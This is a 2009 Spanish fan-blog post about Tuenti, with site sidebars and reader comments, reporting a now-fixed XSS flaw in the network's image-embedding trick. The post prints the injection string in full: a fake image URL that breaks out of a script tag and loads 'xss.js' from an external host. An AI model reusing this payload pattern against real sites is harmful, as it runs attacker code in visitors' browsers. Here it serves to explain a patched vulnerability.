Temas Tuenti
Amigos tuenti API Tuenti Bug Tuenti Contactos Tuenti Contraseña Tuenti Descargar Tuenti El Tuenti Eventos Tuenti Fallo Tuenti Fotos Fotos para Tuenti Fotos Tuenti Hackear Tuenti m.tuenti.com Manual Tuenti noticias tuenti Novedades Tuenti Nuevo Tuenti Perfil tuenti personalizar tuenti Preguntas Tuenti Problemas Tuenti Programas Tuenti Publicidad Tuenti Seguridad Tuenti Subir fotos Tuenti Trucos Tuenti Tuenti Tuenti.com Tuenti.es Tuenti 2009 Tuenti API Tuenti Firefox Tuenti iPhone Tuenti iPod Touch Tuenti Móvil Tuenti para Móviles Tuenti Personalizado TuentiPlus Tuenti Web Utilidades Tuenti videos tuenti Visitas Perfil www.Tuenti.com www.tuenti.es
WP Cumulus Flash tag cloud by Roy Tanck and Luke Morton requires Flash Player 9 or better.
Páginas
Recibir Novedades
Top Comentaristas
ana (74)
are16ocean (73)
Espi (52)
albertttt (50)
DemonDary (32)
DJMeu (31)
Jay (29)
lorena (27)
albertttt (26)
bilboemi (24)
dani16 (23)
Pablo (22)
h3rio (20)
larisa (20)
Visitas a mi web (20)
Os comentabamos de un fallo en la seguridad de Tuenti que permitÃa la ejecución de código en los videos de Tuenti y hoy se ha solucionado otro que permitÃa la ejecución de código usando el truco para insertar imágenes en los mensajes de Tuenti. Tal como se hace eco en Meneame, Rubén DÃaz y Sergio C. R. desvelan como se explotaba este fallo en Tuenti.

El fallo era una vulnerabilidad del tipo XSS que al escribir en cualquier tablón, blog, comentario o mensaje del Tuenti algo de la forma;
http://diazr.com/</script><script src=http   ://diazr.com/xss.js defer=owned.jpg http://diazr.com/</script>
De esta forma se hacÃa creer a Tuenti que era una imágen y al intentar cargarla ejecutarÃa el contenido del archivo ”xss.js”, que podÃa ser cualquier gusano para tu ordenador o una simple broma para cambiar el estado del Tuenti (xss_status_tuenti.js)
La solución que ha puesto Tuenti ha sindo no permitir el truco para insertar imágenes en los mensajes de Tuenti, por lo que no permite insertar los cósigos de DimeQuien, asà que de momento ya no se puede saber quién te visita en Tuenti
Secciones
Lo + Visitado
- Saber quién ha visto Mi Perfil
- Invitaciones Tuenti
- Personaliza tu estado del Tuenti
- TuentiPack, Tuenti personalizado, con radio y chat
- Fotos para Tuenti en Tuentix.com
- Edita tus fotos para tuenti en Picnik.com
- Fotos para Tuenti en TuentiFotos.Com
- Tuenti Chat
- TuentiPack v2.1.3, incluso descarga los videos de Tuenti
- Sacar contraseña Tuenti - Te pueden Hackear Tuenti fácilmente
Últimos Comentarios
- yailita gandia en Tuenti-Solidarios
- dckudhv en Personaliza tu estado del Tuenti
- MarÃa en TOP Preguntas y Respuestas de Tuenti
- angel en Tuenti-Solidarios
- Diego Gálvez en Tuenti-Solidarios
Tuenti Amigos
¿Qué Buscas?
Lo + Comentado de Tuenti
- TuMod, permite Contactos Favoritos, Poner Temas, Contador Visitas, Ampliar Fotos y más
- Tuenti2Twitter, ¿Publicar en Twitter desde Tuenti?
- Tuenti Plus! no es TuentiPlus (TPlus)
- Tuenti personalizado con fondo de la Selección Española de Fútbol
- Tuenti Cam, lanzamiento de Video Chat en Tuenti
- Los cambios ocultos de Tuenti
- Nueva aplicación Tuenti BlackBerry
- Promocionando Tuenti Páginas: Trucos y Utilidades
- Truco para etiquetar fotos desde Tuenti Móvil
Lo + Nuevo de Tuenti
- Los cambios ocultos de Tuenti
- Tuenti2Twitter, ¿Publicar en Twitter desde Tuenti?
- Tuenti Cam, lanzamiento de Video Chat en Tuenti
- TuMod, permite Contactos Favoritos, Poner Temas, Contador Visitas, Ampliar Fotos y más
- Tuenti personalizado con fondo de la Selección Española de Fútbol
- Truco para etiquetar fotos desde Tuenti Móvil
- Promocionando Tuenti Páginas: Trucos y Utilidades
- Nueva aplicación Tuenti BlackBerry
- Tuenti Plus! no es TuentiPlus (TPlus)
- Se podÃa descargar todas las fotos de Tuenti de cualquier usuario: Solventado el fallo
Plantilla de Wordpress Themes y Internet Marketing Center | Traducida por Fernando
Esta web no pertenece a TUENTI TECHNOLOGIES
Datos LSSI -
Privacidad







16 respuestas " Vulnerabilidad que permitÃa ejecución de código en Tuenti "
5 Mayo 2009
Oh genial. Asà que cada dÃa tenemos menos recursos para hacer personalizable nuestro tuenti. Ahora ya no podemos ni decorar nuestro propio blog debido a la incapacidad del equipo administrativo de TUENTI.
Entonces la solución que dan es cortar por lo sano, no? Joder a toda una comunidad que usa su servicio en vez de buscar soluciones? Incopetencia.
Genial. TUENTI, una red social que cada crece hacia lo negativo
6 Mayo 2009
Se fastidió mi blog que era sólo de imágenes.
Tuenti, os voy a mataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaar.
(A vosotros (tuentiadictos.es) no, me refiero a los de tuenti.com.
Cada vez peor…
Además, me apetecÃa hacer la bromita esa del estado
8 Mayo 2009
no me deja metermr en mi cuenta
14 Mayo 2009
[...] que Tuenti ha corregido su último fallo de seguridad no permite usar el truco para insertar imágenes en mensajes (lo que tampoco permite saber [...]
15 Mayo 2009
Como puedo visitar un perfil y que no kede constancia…yo creo q debe de haber algo que privatice cuantas veces entras no???
16 Mayo 2009
Yo desde aquà propongo que todos hagamos una llamada de atención a Tuenti. Enviad todos los mensajes de queja que podáis, diciendo que queréis que se restablezca la posibilidad de incluir fotos en los tablones, blogs y mensajes.
Si reciben miles de mensajes de ese tipo al final tendrán que buscar la manera de restablecer el servicio sin que haya fallos de seguridad…
17 Mayo 2009
Bueno, a mà en relidad lo de las fotos me parece una tonterÃa, para eso ya tenemos el apartado para subir fotos, los comentarios son para comentar; lo que de verdad me ha fastidiado ha sido lo del código de DimeQuién… una pena.
27 Mayo 2009
[...] que Tuenti ha solucionado un fallo de seguridad, solo sirven los iconos por defecto (no funcionan los “Emoticonos disponibles” ni [...]
28 Mayo 2009
[...] nuevo truco para poner fotos en el blog, tablón o comentarios del Tuenti, ya que desde que se ha corregido un fallo de Tuenti no permitÃa usar el antiguo truco para poner imágenes ni saber quien visita tu [...]
30 Mayo 2009
Quales son los codigos que tienes que poner en el perfil del tuenti para el dimequien?
7 Junio 2009
el nuevo tuenti no me deja subir foto le doy a subir y me dale una raya en el medio y se keda asi k le puede pasar me puede responder a mi msn??gracias
8 Junio 2009
a mi tampoco me deja subir fotos me pasa igual una lista negra en medio dela pantalla y de hay no avnza nadaa!!!! SOLUCIONN!!????¿¿?? me pasa desde q ya se instalo definitivmente el tuenti nuevooo”·”!
26 Agosto 2009
Vamos, no es para tanto, solo hay que subir la foto y una vez la tengas subida ya puedes usarla para decorar, lo unico jodido es lo del dime quien, que ya no funciona
6 Septiembre 2009
nesesito saber como es que funsiona esto
27 Enero 2010
a ver la pagina me da error de servidor diciendo q es desde dentro,osea interno…pero en cambio metes otro e-mail y si q va..q ocurre???
20 Abril 2010
Joder encima la wen de dimequien esta cerrada o se ha caido, imagino que significa que ya se acabó, no se podrán ver las visitas
jooo